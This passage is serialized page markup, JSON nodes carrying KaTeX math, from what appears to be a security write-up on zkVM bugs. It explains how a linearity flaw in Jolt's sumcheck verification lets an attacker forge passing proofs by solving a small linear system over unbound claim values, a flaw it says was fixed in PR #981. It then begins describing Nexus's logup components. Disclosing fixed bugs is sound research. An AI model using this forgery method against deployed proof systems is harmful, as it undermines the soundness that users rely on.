",{"type":24,"tag":145,"props":122577,"children":122579},{"className":122578},[10807,10808],[122580],{"type":24,"tag":301,"props":122581,"children":122583},{"className":122582},[10813],[122584],{"type":24,"tag":301,"props":122585,"children":122587},{"className":122586,"ariaHidden":10819},[10818],[122588],{"type":24,"tag":301,"props":122589,"children":122591},{"className":122590},[10824],[122592,122596],{"type":24,"tag":301,"props":122593,"children":122595},{"className":122594,"style":116710},[10829],[],{"type":24,"tag":301,"props":122597,"children":122599},{"className":122598},[10835],[122600,122605],{"type":24,"tag":301,"props":122601,"children":122603},{"className":122602,"style":121827},[10835,28357],[122604],{"type":30,"value":121830},{"type":24,"tag":301,"props":122606,"children":122608},{"className":122607},[10850],[122609],{"type":24,"tag":301,"props":122610,"children":122612},{"className":122611},[10855,28411],[122613,122642],{"type":24,"tag":301,"props":122614,"children":122616},{"className":122615},[10860],[122617,122637],{"type":24,"tag":301,"props":122618,"children":122620},{"className":122619,"style":100273},[10865],[122621],{"type":24,"tag":301,"props":122622,"children":122623},{"style":122462},[122624,122628],{"type":24,"tag":301,"props":122625,"children":122627},{"className":122626,"style":10875},[10874],[],{"type":24,"tag":301,"props":122629,"children":122631},{"className":122630},[10880,10881,10882,10883],[122632],{"type":24,"tag":301,"props":122633,"children":122635},{"className":122634},[10835,28357,10883],[122636],{"type":30,"value":10564},{"type":24,"tag":301,"props":122638,"children":122640},{"className":122639},[28514],[122641],{"type":30,"value":28517},{"type":24,"tag":301,"props":122643,"children":122645},{"className":122644},[10860],[122646],{"type":24,"tag":301,"props":122647,"children":122649},{"className":122648,"style":99828},[10865],[122650],{"type":24,"tag":301,"props":122651,"children":122652},{},[],{"type":30,"value":122654}," are random coefficients derived from the transcript. Since ",{"type":24,"tag":145,"props":122656,"children":122658},{"className":122657},[],[122659],{"type":30,"value":122203},{"type":30,"value":122661}," (containing ",{"type":24,"tag":145,"props":122663,"children":122665},{"className":122664},[10807,10808],[122666],{"type":24,"tag":301,"props":122667,"children":122669},{"className":122668},[10813],[122670],{"type":24,"tag":301,"props":122671,"children":122673},{"className":122672,"ariaHidden":10819},[10818],[122674],{"type":24,"tag":301,"props":122675,"children":122677},{"className":122676},[10824],[122678,122682],{"type":24,"tag":301,"props":122679,"children":122681},{"className":122680,"style":117737},[10829],[],{"type":24,"tag":301,"props":122683,"children":122685},{"className":122684},[10835],[122686,122691],{"type":24,"tag":301,"props":122687,"children":122689},{"className":122688,"style":99979},[10835,28357],[122690],{"type":30,"value":99982},{"type":24,"tag":301,"props":122692,"children":122694},{"className":122693},[10850],[122695],{"type":24,"tag":301,"props":122696,"children":122698},{"className":122697},[10855,28411],[122699,122728],{"type":24,"tag":301,"props":122700,"children":122702},{"className":122701},[10860],[122703,122723],{"type":24,"tag":301,"props":122704,"children":122706},{"className":122705,"style":100273},[10865],[122707],{"type":24,"tag":301,"props":122708,"children":122709},{"style":117169},[122710,122714],{"type":24,"tag":301,"props":122711,"children":122713},{"className":122712,"style":10875},[10874],[],{"type":24,"tag":301,"props":122715,"children":122717},{"className":122716},[10880,10881,10882,10883],[122718],{"type":24,"tag":301,"props":122719,"children":122721},{"className":122720},[10835,28357,10883],[122722],{"type":30,"value":10564},{"type":24,"tag":301,"props":122724,"children":122726},{"className":122725},[28514],[122727],{"type":30,"value":28517},{"type":24,"tag":301,"props":122729,"children":122731},{"className":122730},[10860],[122732],{"type":24,"tag":301,"props":122733,"children":122735},{"className":122734,"style":99828},[10865],[122736],{"type":24,"tag":301,"props":122737,"children":122738},{},[],{"type":30,"value":122740},") were not in the transcript, the ",{"type":24,"tag":145,"props":122742,"children":122744},{"className":122743},[10807,10808],[122745],{"type":24,"tag":301,"props":122746,"children":122748},{"className":122747},[10813],[122749],{"type":24,"tag":301,"props":122750,"children":122752},{"className":122751,"ariaHidden":10819},[10818],[122753],{"type":24,"tag":301,"props":122754,"children":122756},{"className":122755},[10824],[122757,122761],{"type":24,"tag":301,"props":122758,"children":122760},{"className":122759,"style":116710},[10829],[],{"type":24,"tag":301,"props":122762,"children":122764},{"className":122763},[10835],[122765,122770],{"type":24,"tag":301,"props":122766,"children":122768},{"className":122767,"style":121827},[10835,28357],[122769],{"type":30,"value":121830},{"type":24,"tag":301,"props":122771,"children":122773},{"className":122772},[10850],[122774],{"type":24,"tag":301,"props":122775,"children":122777},{"className":122776},[10855,28411],[122778,122807],{"type":24,"tag":301,"props":122779,"children":122781},{"className":122780},[10860],[122782,122802],{"type":24,"tag":301,"props":122783,"children":122785},{"className":122784,"style":100273},[10865],[122786],{"type":24,"tag":301,"props":122787,"children":122788},{"style":122462},[122789,122793],{"type":24,"tag":301,"props":122790,"children":122792},{"className":122791,"style":10875},[10874],[],{"type":24,"tag":301,"props":122794,"children":122796},{"className":122795},[10880,10881,10882,10883],[122797],{"type":24,"tag":301,"props":122798,"children":122800},{"className":122799},[10835,28357,10883],[122801],{"type":30,"value":10564},{"type":24,"tag":301,"props":122803,"children":122805},{"className":122804},[28514],[122806],{"type":30,"value":28517},{"type":24,"tag":301,"props":122808,"children":122810},{"className":122809},[10860],[122811],{"type":24,"tag":301,"props":122812,"children":122814},{"className":122813,"style":99828},[10865],[122815],{"type":24,"tag":301,"props":122816,"children":122817},{},[],{"type":30,"value":122819}," values are independent of ",{"type":24,"tag":145,"props":122821,"children":122823},{"className":122822},[10807,10808],[122824],{"type":24,"tag":301,"props":122825,"children":122827},{"className":122826},[10813],[122828],{"type":24,"tag":301,"props":122829,"children":122831},{"className":122830,"ariaHidden":10819},[10818],[122832],{"type":24,"tag":301,"props":122833,"children":122835},{"className":122834},[10824],[122836,122840],{"type":24,"tag":301,"props":122837,"children":122839},{"className":122838,"style":117737},[10829],[],{"type":24,"tag":301,"props":122841,"children":122843},{"className":122842},[10835],[122844,122849],{"type":24,"tag":301,"props":122845,"children":122847},{"className":122846,"style":99979},[10835,28357],[122848],{"type":30,"value":99982},{"type":24,"tag":301,"props":122850,"children":122852},{"className":122851},[10850],[122853],{"type":24,"tag":301,"props":122854,"children":122856},{"className":122855},[10855,28411],[122857,122886],{"type":24,"tag":301,"props":122858,"children":122860},{"className":122859},[10860],[122861,122881],{"type":24,"tag":301,"props":122862,"children":122864},{"className":122863,"style":100273},[10865],[122865],{"type":24,"tag":301,"props":122866,"children":122867},{"style":117169},[122868,122872],{"type":24,"tag":301,"props":122869,"children":122871},{"className":122870,"style":10875},[10874],[],{"type":24,"tag":301,"props":122873,"children":122875},{"className":122874},[10880,10881,10882,10883],[122876],{"type":24,"tag":301,"props":122877,"children":122879},{"className":122878},[10835,28357,10883],[122880],{"type":30,"value":10564},{"type":24,"tag":301,"props":122882,"children":122884},{"className":122883},[28514],[122885],{"type":30,"value":28517},{"type":24,"tag":301,"props":122887,"children":122889},{"className":122888},[10860],[122890],{"type":24,"tag":301,"props":122891,"children":122893},{"className":122892,"style":99828},[10865],[122894],{"type":24,"tag":301,"props":122895,"children":122896},{},[],{"type":30,"value":206},{"type":24,"tag":32,"props":122899,"children":122900},{},[122901],{"type":24,"tag":60,"props":122902,"children":122903},{},[122904],{"type":30,"value":122905},"Why it's linear:",{"type":24,"tag":32,"props":122907,"children":122908},{},[122909,122911],{"type":30,"value":122910},"Due to the compression optimization (prover omits one less coefficient per round), the final verification equation traces back through the rounds and becomes linear in the input claim ",{"type":24,"tag":145,"props":122912,"children":122914},{"className":122913},[10807,10808],[122915],{"type":24,"tag":301,"props":122916,"children":122918},{"className":122917},[10813],[122919],{"type":24,"tag":301,"props":122920,"children":122922},{"className":122921,"ariaHidden":10819},[10818],[122923],{"type":24,"tag":301,"props":122924,"children":122926},{"className":122925},[10824],[122927,122931],{"type":24,"tag":301,"props":122928,"children":122930},{"className":122929,"style":28352},[10829],[],{"type":24,"tag":301,"props":122932,"children":122934},{"className":122933,"style":99979},[10835,28357],[122935],{"type":30,"value":99982},{"type":24,"tag":32,"props":122937,"children":122938},{},[122939],{"type":24,"tag":145,"props":122940,"children":122942},{"className":122941},[10807,10808],[122943],{"type":24,"tag":301,"props":122944,"children":122946},{"className":122945},[10813],[122947],{"type":24,"tag":301,"props":122948,"children":122950},{"className":122949,"ariaHidden":10819},[10818],[122951,123041,123067,123093],{"type":24,"tag":301,"props":122952,"children":122954},{"className":122953},[10824],[122955,122959,123028,123032,123037],{"type":24,"tag":301,"props":122956,"children":122958},{"className":122957,"style":117737},[10829],[],{"type":24,"tag":301,"props":122960,"children":122962},{"className":122961},[10835],[122963,122969],{"type":24,"tag":301,"props":122964,"children":122966},{"className":122965,"style":28889},[10835,28357],[122967],{"type":30,"value":122968},"C",{"type":24,"tag":301,"props":122970,"children":122972},{"className":122971},[10850],[122973],{"type":24,"tag":301,"props":122974,"children":122976},{"className":122975},[10855,28411],[122977,123017],{"type":24,"tag":301,"props":122978,"children":122980},{"className":122979},[10860],[122981,123012],{"type":24,"tag":301,"props":122982,"children":122985},{"className":122983,"style":122984},[10865],"height:0.3361em;",[122986],{"type":24,"tag":301,"props":122987,"children":122989},{"style":122988},"top:-2.55em;margin-left:-0.0715em;margin-right:0.05em;",[122990,122994],{"type":24,"tag":301,"props":122991,"children":122993},{"className":122992,"style":10875},[10874],[],{"type":24,"tag":301,"props":122995,"children":122997},{"className":122996},[10880,10881,10882,10883],[122998],{"type":24,"tag":301,"props":122999,"children":123001},{"className":123000},[10835,10883],[123002],{"type":24,"tag":301,"props":123003,"children":123005},{"className":123004},[10835,30,10883],[123006],{"type":24,"tag":301,"props":123007,"children":123009},{"className":123008},[10835,10883],[123010],{"type":30,"value":123011},"final",{"type":24,"tag":301,"props":123013,"children":123015},{"className":123014},[28514],[123016],{"type":30,"value":28517},{"type":24,"tag":301,"props":123018,"children":123020},{"className":123019},[10860],[123021],{"type":24,"tag":301,"props":123022,"children":123024},{"className":123023,"style":99828},[10865],[123025],{"type":24,"tag":301,"props":123026,"children":123027},{},[],{"type":24,"tag":301,"props":123029,"children":123031},{"className":123030,"style":11012},[10914],[],{"type":24,"tag":301,"props":123033,"children":123035},{"className":123034},[11017],[123036],{"type":30,"value":523},{"type":24,"tag":301,"props":123038,"children":123040},{"className":123039,"style":11012},[10914],[],{"type":24,"tag":301,"props":123042,"children":123044},{"className":123043},[10824],[123045,123049,123054,123058,123063],{"type":24,"tag":301,"props":123046,"children":123048},{"className":123047,"style":121822},[10829],[],{"type":24,"tag":301,"props":123050,"children":123052},{"className":123051},[10835,28357],[123053],{"type":30,"value":188},{"type":24,"tag":301,"props":123055,"children":123057},{"className":123056,"style":10915},[10914],[],{"type":24,"tag":301,"props":123059,"children":123061},{"className":123060},[10920],[123062],{"type":30,"value":118002},{"type":24,"tag":301,"props":123064,"children":123066},{"className":123065,"style":10915},[10914],[],{"type":24,"tag":301,"props":123068,"children":123070},{"className":123069},[10824],[123071,123075,123080,123084,123089],{"type":24,"tag":301,"props":123072,"children":123074},{"className":123073,"style":121851},[10829],[],{"type":24,"tag":301,"props":123076,"children":123078},{"className":123077,"style":99979},[10835,28357],[123079],{"type":30,"value":99982},{"type":24,"tag":301,"props":123081,"children":123083},{"className":123082,"style":10915},[10914],[],{"type":24,"tag":301,"props":123085,"children":123087},{"className":123086},[10920],[123088],{"type":30,"value":11206},{"type":24,"tag":301,"props":123090,"children":123092},{"className":123091,"style":10915},[10914],[],{"type":24,"tag":301,"props":123094,"children":123096},{"className":123095},[10824],[123097,123101],{"type":24,"tag":301,"props":123098,"children":123100},{"className":123099,"style":99660},[10829],[],{"type":24,"tag":301,"props":123102,"children":123104},{"className":123103},[10835,28357],[123105],{"type":30,"value":5613},{"type":24,"tag":32,"props":123107,"children":123108},{},[123109,123110,123149,123151,123176,123178,123308,123310,123431],{"type":30,"value":122575},{"type":24,"tag":145,"props":123111,"children":123113},{"className":123112},[10807,10808],[123114],{"type":24,"tag":301,"props":123115,"children":123117},{"className":123116},[10813],[123118],{"type":24,"tag":301,"props":123119,"children":123121},{"className":123120,"ariaHidden":10819},[10818],[123122],{"type":24,"tag":301,"props":123123,"children":123125},{"className":123124},[10824],[123126,123130,123135,123140,123144],{"type":24,"tag":301,"props":123127,"children":123129},{"className":123128,"style":121794},[10829],[],{"type":24,"tag":301,"props":123131,"children":123133},{"className":123132},[10835,28357],[123134],{"type":30,"value":188},{"type":24,"tag":301,"props":123136,"children":123138},{"className":123137},[10946],[123139],{"type":30,"value":10949},{"type":24,"tag":301,"props":123141,"children":123143},{"className":123142,"style":10953},[10914],[],{"type":24,"tag":301,"props":123145,"children":123147},{"className":123146},[10835,28357],[123148],{"type":30,"value":5613},{"type":30,"value":123150}," are determined by the transcript (independent of ",{"type":24,"tag":145,"props":123152,"children":123154},{"className":123153},[10807,10808],[123155],{"type":24,"tag":301,"props":123156,"children":123158},{"className":123157},[10813],[123159],{"type":24,"tag":301,"props":123160,"children":123162},{"className":123161,"ariaHidden":10819},[10818],[123163],{"type":24,"tag":301,"props":123164,"children":123166},{"className":123165},[10824],[123167,123171],{"type":24,"tag":301,"props":123168,"children":123170},{"className":123169,"style":28352},[10829],[],{"type":24,"tag":301,"props":123172,"children":123174},{"className":123173,"style":99979},[10835,28357],[123175],{"type":30,"value":99982},{"type":30,"value":123177},"). The verifier checks that ",{"type":24,"tag":145,"props":123179,"children":123181},{"className":123180},[10807,10808],[123182],{"type":24,"tag":301,"props":123183,"children":123185},{"className":123184},[10813],[123186],{"type":24,"tag":301,"props":123187,"children":123189},{"className":123188,"ariaHidden":10819},[10818],[123190,123276],{"type":24,"tag":301,"props":123191,"children":123193},{"className":123192},[10824],[123194,123198,123263,123267,123272],{"type":24,"tag":301,"props":123195,"children":123197},{"className":123196,"style":117737},[10829],[],{"type":24,"tag":301,"props":123199,"children":123201},{"className":123200},[10835],[123202,123207],{"type":24,"tag":301,"props":123203,"children":123205},{"className":123204,"style":28889},[10835,28357],[123206],{"type":30,"value":122968},{"type":24,"tag":301,"props":123208,"children":123210},{"className":123209},[10850],[123211],{"type":24,"tag":301,"props":123212,"children":123214},{"className":123213},[10855,28411],[123215,123252],{"type":24,"tag":301,"props":123216,"children":123218},{"className":123217},[10860],[123219,123247],{"type":24,"tag":301,"props":123220,"children":123222},{"className":123221,"style":122984},[10865],[123223],{"type":24,"tag":301,"props":123224,"children":123225},{"style":122988},[123226,123230],{"type":24,"tag":301,"props":123227,"children":123229},{"className":123228,"style":10875},[10874],[],{"type":24,"tag":301,"props":123231,"children":123233},{"className":123232},[10880,10881,10882,10883],[123234],{"type":24,"tag":301,"props":123235,"children":123237},{"className":123236},[10835,10883],[123238],{"type":24,"tag":301,"props":123239,"children":123241},{"className":123240},[10835,30,10883],[123242],{"type":24,"tag":301,"props":123243,"children":123245},{"className":123244},[10835,10883],[123246],{"type":30,"value":123011},{"type":24,"tag":301,"props":123248,"children":123250},{"className":123249},[28514],[123251],{"type":30,"value":28517},{"type":24,"tag":301,"props":123253,"children":123255},{"className":123254},[10860],[123256],{"type":24,"tag":301,"props":123257,"children":123259},{"className":123258,"style":99828},[10865],[123260],{"type":24,"tag":301,"props":123261,"children":123262},{},[],{"type":24,"tag":301,"props":123264,"children":123266},{"className":123265,"style":11012},[10914],[],{"type":24,"tag":301,"props":123268,"children":123270},{"className":123269},[11017],[123271],{"type":30,"value":523},{"type":24,"tag":301,"props":123273,"children":123275},{"className":123274,"style":11012},[10914],[],{"type":24,"tag":301,"props":123277,"children":123279},{"className":123278},[10824],[123280,123284,123294,123299],{"type":24,"tag":301,"props":123281,"children":123283},{"className":123282,"style":101157},[10829],[],{"type":24,"tag":301,"props":123285,"children":123287},{"className":123286},[10835,30],[123288],{"type":24,"tag":301,"props":123289,"children":123291},{"className":123290},[10835],[123292],{"type":30,"value":123293},"expected",{"type":24,"tag":301,"props":123295,"children":123297},{"className":123296,"style":99745},[10835],[123298],{"type":30,"value":9918},{"type":24,"tag":301,"props":123300,"children":123302},{"className":123301},[10835,30],[123303],{"type":24,"tag":301,"props":123304,"children":123306},{"className":123305},[10835],[123307],{"type":30,"value":44287},{"type":30,"value":123309}," (from PCS opening), this becomes ",{"type":24,"tag":145,"props":123311,"children":123313},{"className":123312},[10807,10808],[123314],{"type":24,"tag":301,"props":123315,"children":123317},{"className":123316},[10813],[123318],{"type":24,"tag":301,"props":123319,"children":123321},{"className":123320,"ariaHidden":10819},[10818],[123322,123348,123374,123400],{"type":24,"tag":301,"props":123323,"children":123325},{"className":123324},[10824],[123326,123330,123335,123339,123344],{"type":24,"tag":301,"props":123327,"children":123329},{"className":123328,"style":121822},[10829],[],{"type":24,"tag":301,"props":123331,"children":123333},{"className":123332},[10835,28357],[123334],{"type":30,"value":188},{"type":24,"tag":301,"props":123336,"children":123338},{"className":123337,"style":10915},[10914],[],{"type":24,"tag":301,"props":123340,"children":123342},{"className":123341},[10920],[123343],{"type":30,"value":118002},{"type":24,"tag":301,"props":123345,"children":123347},{"className":123346,"style":10915},[10914],[],{"type":24,"tag":301,"props":123349,"children":123351},{"className":123350},[10824],[123352,123356,123361,123365,123370],{"type":24,"tag":301,"props":123353,"children":123355},{"className":123354,"style":121851},[10829],[],{"type":24,"tag":301,"props":123357,"children":123359},{"className":123358,"style":99979},[10835,28357],[123360],{"type":30,"value":99982},{"type":24,"tag":301,"props":123362,"children":123364},{"className":123363,"style":10915},[10914],[],{"type":24,"tag":301,"props":123366,"children":123368},{"className":123367},[10920],[123369],{"type":30,"value":11206},{"type":24,"tag":301,"props":123371,"children":123373},{"className":123372,"style":10915},[10914],[],{"type":24,"tag":301,"props":123375,"children":123377},{"className":123376},[10824],[123378,123382,123387,123391,123396],{"type":24,"tag":301,"props":123379,"children":123381},{"className":123380,"style":99660},[10829],[],{"type":24,"tag":301,"props":123383,"children":123385},{"className":123384},[10835,28357],[123386],{"type":30,"value":5613},{"type":24,"tag":301,"props":123388,"children":123390},{"className":123389,"style":11012},[10914],[],{"type":24,"tag":301,"props":123392,"children":123394},{"className":123393},[11017],[123395],{"type":30,"value":523},{"type":24,"tag":301,"props":123397,"children":123399},{"className":123398,"style":11012},[10914],[],{"type":24,"tag":301,"props":123401,"children":123403},{"className":123402},[10824],[123404,123408,123417,123422],{"type":24,"tag":301,"props":123405,"children":123407},{"className":123406,"style":101157},[10829],[],{"type":24,"tag":301,"props":123409,"children":123411},{"className":123410},[10835,30],[123412],{"type":24,"tag":301,"props":123413,"children":123415},{"className":123414},[10835],[123416],{"type":30,"value":123293},{"type":24,"tag":301,"props":123418,"children":123420},{"className":123419,"style":99745},[10835],[123421],{"type":30,"value":9918},{"type":24,"tag":301,"props":123423,"children":123425},{"className":123424},[10835,30],[123426],{"type":24,"tag":301,"props":123427,"children":123429},{"className":123428},[10835],[123430],{"type":30,"value":44287},{"type":30,"value":206},{"type":24,"tag":32,"props":123433,"children":123434},{},[123435],{"type":30,"value":123436},"Because multiple claims are coupled across verification stages, the attacker may need to adjust a small set of claim values simultaneously to satisfy all affected constraints.",{"type":24,"tag":32,"props":123438,"children":123439},{},[123440],{"type":30,"value":123441},"This can be exploited by solving a small linear system over a handful of unbound claim values so all affected checks pass simultaneously.",{"type":24,"tag":32,"props":123443,"children":123444},{},[123445,123450,123452],{"type":24,"tag":60,"props":123446,"children":123447},{},[123448],{"type":30,"value":123449},"Status:",{"type":30,"value":123451}," Fixed on October 3, 2025 via ",{"type":24,"tag":188,"props":123453,"children":123456},{"href":123454,"rel":123455},"https://github.com/a16z/jolt/pull/981",[192],[123457],{"type":30,"value":123458},"PR #981",{"type":24,"tag":2719,"props":123460,"children":123461},{},[],{"type":24,"tag":80,"props":123463,"children":123465},{"id":123464},"nexus",[123466],{"type":30,"value":114560},{"type":24,"tag":32,"props":123468,"children":123469},{},[123470],{"type":30,"value":123471},"Nexus is a zkVM built on the Stwo prover (from StarkWare). It uses STARKs with logup lookup arguments.",{"type":24,"tag":32,"props":123473,"children":123474},{},[123475,123477,123482],{"type":30,"value":123476},"Nexus splits verification into ",{"type":24,"tag":60,"props":123478,"children":123479},{},[123480],{"type":30,"value":123481},"components",{"type":30,"value":123483}," such as instruction execution, memory, registers, etc. Each component handles a subset of constraints.",{"type":24,"tag":32,"props":123485,"children":123486},{},[123487,123489,123494],{"type":30,"value":123488},"Each component emits and consumes lookup tuples. The component's ",{"type":24,"tag":145,"props":123490,"children":123492},{"className":123491},[],[123493],{"type":30,"value":121603},{"type":30,"value":123495}," summarizes its net contribution:",{"type":24,"tag":32,"props":123497,"children":123498},{},[123499],{"type":24,"tag":145,"props":123500,"children":123502},{"className":123501},[10807,10808],[123503],{"type":24,"tag":301,"props":123504,"children":123506},{"className":123505},[10813],[123507],{"type":24,"tag":301,"props":123508,"children":123510},{"className":123509,"ariaHidden":10819},[10818],[123511,123607,123856],{"type":24,"tag":301,"props":123512,"children":123514},{"className":123513},[10824],[123515,123519,123528,123533,123594,123598,123603],{"type":24,"tag":301,"props":123516,"children":123518},{"className":123517,"style":101157},[10829],[],{"type":24,"tag":301,"props":123520,"children":123522},{"className":123521},[10835,30],[123523],{"type":24,"tag":301,"props":123524,"children":123526},{"className":123525},[10835],[123527],{"type":30,"value":120832},{"type":24,"tag":301,"props":123529,"children":123531},{"className":123530,"style":99745},[10835],[123532],{"type":30,"value":9918},{"type":24,"tag":301,"props":123534,"children":123536},{"className":123535},[10835],[123537,123546],{"type":24,"tag":301,"props":123538,"children":123540},{"className":123539},[10835,30],[123541],{"type":24,"tag":301,"props":123542,"children":123544},{"className":123543},[10835],[123545],{"type":30,"value":83344},{"type":24,"tag":301,"props":123547,"children":123549},{"className":123548},[10850],[123550],{"type":24,"tag":301,"props":123551,"children":123553},{"className":123552},[10855,28411],[123554,123583],{"type":24,"tag":301,"props":123555,"children":123557},{"className":123556},[10860],[123558,123578],{"type":24,"tag":301,"props":123559,"children":123561},{"className":123560,"style":100273},[10865],[123562],{"type":24,"tag":301,"props":123563,"children":123564},{"style":120869},[123565,123569],{"type":24,"tag":301,"props":123566,"children":123568},{"className":123567,"style":10875},[10874],[],{"type":24,"tag":301,"props":123570,"children":123572},{"className":123571},[10880,10881,10882,10883],[123573],{"type":24,"tag":301,"props":123574,"children":123576},{"className":123575},[10835,28357,10883],[123577],{"type":30,"value":10564},{"type":24,"tag":301,"props":123579,"children":123581},{"className":123580},[28514],[123582],{"type":30,"value":28517},{"type":24,"tag":301,"props":123584,"children":123586},{"className":123585},[10860],[123587],{"type":24,"tag":301,"props":123588,"children":123590},{"className":123589,"style":99828},[10865],[123591],{"type":24,"tag":301,"props":123592,"children":123593},{},[],{"type":24,"tag":301,"props":123595,"children":123597},{"className":123596,"style":11012},[10914],[],{"type":24,"tag":301,"props":123599,"children":123601},{"className":123600},[11017],[123602],{"type":30,"value":523},{"type":24,"tag":301,"props":123604,"children":123606},{"className":123605,"style":11012},[10914],[],{"type":24,"tag":301,"props":123608,"children":123610},{"className":123609},[10824],[123611,123616,123673,123677,123843,123847,123852],{"type":24,"tag":301,"props":123612,"children":123615},{"className":123613,"style":123614},[10829],"height:1.4734em;vertical-align:-0.6283em;",[],{"type":24,"tag":301,"props":123617,"children":123619},{"className":123618},[28393],[123620,123625],{"type":24,"tag":301,"props":123621,"children":123623},{"className":123622,"style":28400},[28393,28398,28399],[123624],{"type":30,"value":115536},{"type":24,"tag":301,"props":123626,"children":123628},{"className":123627},[10850],[123629],{"type":24,"tag":301,"props":123630,"children":123632},{"className":123631},[10855,28411],[123633,123662],{"type":24,"tag":301,"props":123634,"children":123636},{"className":123635},[10860],[123637,123657],{"type":24,"tag":301,"props":123638,"children":123640},{"className":123639,"style":120946},[10865],[123641],{"type":24,"tag":301,"props":123642,"children":123643},{"style":28424},[123644,123648],{"type":24,"tag":301,"props":123645,"children":123647},{"className":123646,"style":10875},[10874],[],{"type":24,"tag":301,"props":123649,"children":123651},{"className":123650},[10880,10881,10882,10883],[123652],{"type":24,"tag":301,"props":123653,"children":123655},{"className":123654,"style":120962},[10835,28357,10883],[123656],{"type":30,"value":15470},{"type":24,"tag":301,"props":123658,"children":123660},{"className":123659},[28514],[123661],{"type":30,"value":28517},{"type":24,"tag":301,"props":123663,"children":123665},{"className":123664},[10860],[123666],{"type":24,"tag":301,"props":123667,"children":123669},{"className":123668,"style":120977},[10865],[123670],{"type":24,"tag":301,"props":123671,"children":123672},{},[],{"type":24,"tag":301,"props":123674,"children":123676},{"className":123675,"style":10953},[10914],[],{"type":24,"tag":301,"props":123678,"children":123680},{"className":123679},[10835],[123681,123685,123839],{"type":24,"tag":301,"props":123682,"children":123684},{"className":123683},[28486,120257],[],{"type":24,"tag":301,"props":123686,"children":123688},{"className":123687},[120262],[123689],{"type":24,"tag":301,"props":123690,"children":123692},{"className":123691},[10855,28411],[123693,123827],{"type":24,"tag":301,"props":123694,"children":123696},{"className":123695},[10860],[123697,123822],{"type":24,"tag":301,"props":123698,"children":123700},{"className":123699,"style":120275},[10865],[123701,123791,123802],{"type":24,"tag":301,"props":123702,"children":123703},{"style":120279},[123704,123708],{"type":24,"tag":301,"props":123705,"children":123707},{"className":123706,"style":118911},[10874],[],{"type":24,"tag":301,"props":123709,"children":123711},{"className":123710},[10880,10881,10882,10883],[123712],{"type":24,"tag":301,"props":123713,"children":123715},{"className":123714},[10835,10883],[123716,123721,123726],{"type":24,"tag":301,"props":123717,"children":123719},{"className":123718,"style":120296},[10835,28357,10883],[123720],{"type":30,"value":120299},{"type":24,"tag":301,"props":123722,"children":123724},{"className":123723},[10920,10883],[123725],{"type":30,"value":10894},{"type":24,"tag":301,"props":123727,"children":123729},{"className":123728},[10835,10883],[123730,123740],{"type":24,"tag":301,"props":123731,"children":123733},{"className":123732},[10835,30,10883],[123734],{"type":24,"tag":301,"props":123735,"children":123737},{"className":123736},[10835,10883],[123738],{"type":30,"value":123739},"produced",{"type":24,"tag":301,"props":123741,"children":123743},{"className":123742},[10850],[123744],{"type":24,"tag":301,"props":123745,"children":123747},{"className":123746},[10855,28411],[123748,123779],{"type":24,"tag":301,"props":123749,"children":123751},{"className":123750},[10860],[123752,123774],{"type":24,"tag":301,"props":123753,"children":123756},{"className":123754,"style":123755},[10865],"height:0.2052em;",[123757],{"type":24,"tag":301,"props":123758,"children":123760},{"style":123759},"top:-2.2341em;margin-right:0.0714em;",[123761,123765],{"type":24,"tag":301,"props":123762,"children":123764},{"className":123763,"style":115601},[10874],[],{"type":24,"tag":301,"props":123766,"children":123768},{"className":123767},[10880,115606,115607,10883],[123769],{"type":24,"tag":301,"props":123770,"children":123772},{"className":123771,"style":120962},[10835,28357,10883],[123773],{"type":30,"value":15470},{"type":24,"tag":301,"props":123775,"children":123777},{"className":123776},[28514],[123778],{"type":30,"value":28517},{"type":24,"tag":301,"props":123780,"children":123782},{"className":123781},[10860],[123783],{"type":24,"tag":301,"props":123784,"children":123787},{"className":123785,"style":123786},[10865],"height:0.4048em;",[123788],{"type":24,"tag":301,"props":123789,"children":123790},{},[],{"type":24,"tag":301,"props":123792,"children":123793},{"style":120312},[123794,123798],{"type":24,"tag":301,"props":123795,"children":123797},{"className":123796,"style":118911},[10874],[],{"type":24,"tag":301,"props":123799,"children":123801},{"className":123800,"style":120322},[120321],[],{"type":24,"tag":301,"props":123803,"children":123804},{"style":120326},[123805,123809],{"type":24,"tag":301,"props":123806,"children":123808},{"className":123807,"style":118911},[10874],[],{"type":24,"tag":301,"props":123810,"children":123812},{"className":123811},[10880,10881,10882,10883],[123813],{"type":24,"tag":301,"props":123814,"children":123816},{"className":123815},[10835,10883],[123817],{"type":24,"tag":301,"props":123818,"children":123820},{"className":123819},[10835,10883],[123821],{"type":30,"value":546},{"type":24,"tag":301,"props":123823,"children":123825},{"className":123824},[28514],[123826],{"type":30,"value":28517},{"type":24,"tag":301,"props":123828,"children":123830},{"className":123829},[10860],[123831],{"type":24,"tag":301,"props":123832,"children":123835},{"className":123833,"style":123834},[10865],"height:0.6283em;",[123836],{"type":24,"tag":301,"props":123837,"children":123838},{},[],{"type":24,"tag":301,"props":123840,"children":123842},{"className":123841},[28508,120257],[],{"type":24,"tag":301,"props":123844,"children":123846},{"className":123845,"style":10915},[10914],[],{"type":24,"tag":301,"props":123848,"children":123850},{"className":123849},[10920],[123851],{"type":30,"value":10894},{"type":24,"tag":301,"props":123853,"children":123855},{"className":123854,"style":10915},[10914],[],{"type":24,"tag":301,"props":123857,"children":123859},{"className":123858},[10824],[123860,123864,123921,123925],{"type":24,"tag":301,"props":123861,"children":123863},{"className":123862,"style":121171},[10829],[],{"type":24,"tag":301,"props":123865,"children":123867},{"className":123866},[28393],[123868,123873],{"type":24,"tag":301,"props":123869,"children":123871},{"className":123870,"style":28400},[28393,28398,28399],[123872],{"type":30,"value":115536},{"type":24,"tag":301,"props":123874,"children":123876},{"className":123875},[10850],[123877],{"type":24,"tag":301,"props":123878,"children":123880},{"className":123879},[10855,28411],[123881,123910],{"type":24,"tag":301,"props":123882,"children":123884},{"className":123883},[10860],[123885,123905],{"type":24,"tag":301,"props":123886,"children":123888},{"className":123887,"style":120411},[10865],[123889],{"type":24,"tag":301,"props":123890,"children":123891},{"style":28424},[123892,123896],{"type":24,"tag":301,"props":123893,"children":123895},{"className":123894,"style":10875},[10874],[],{"type":24,"tag":301,"props":123897,"children":123899},{"className":123898},[10880,10881,10882,10883],[123900],{"type":24,"tag":301,"props":123901,"children":123903},{"className":123902,"style":101173},[10835,28357,10883],[123904],{"type":30,"value":95387},{"type":24,"tag":301,"props":123906,"children":123908},{"className":123907},[28514],[123909],{"type":30,"value":28517},{"type":24,"tag":301,"props":123911,"children":123913},{"className":123912},[10860],[123914],{"type":24,"tag":301,"props":123915,"children":123917},{"className":123916,"style":121226},[10865],[123918],{"type":24,"tag":301,"props":123919,"children":123920},{},[],{"type":24,"tag":301,"props":123922,"children":123924},{"className":123923,"style":10953},[10914],[],{"type":24,"tag":30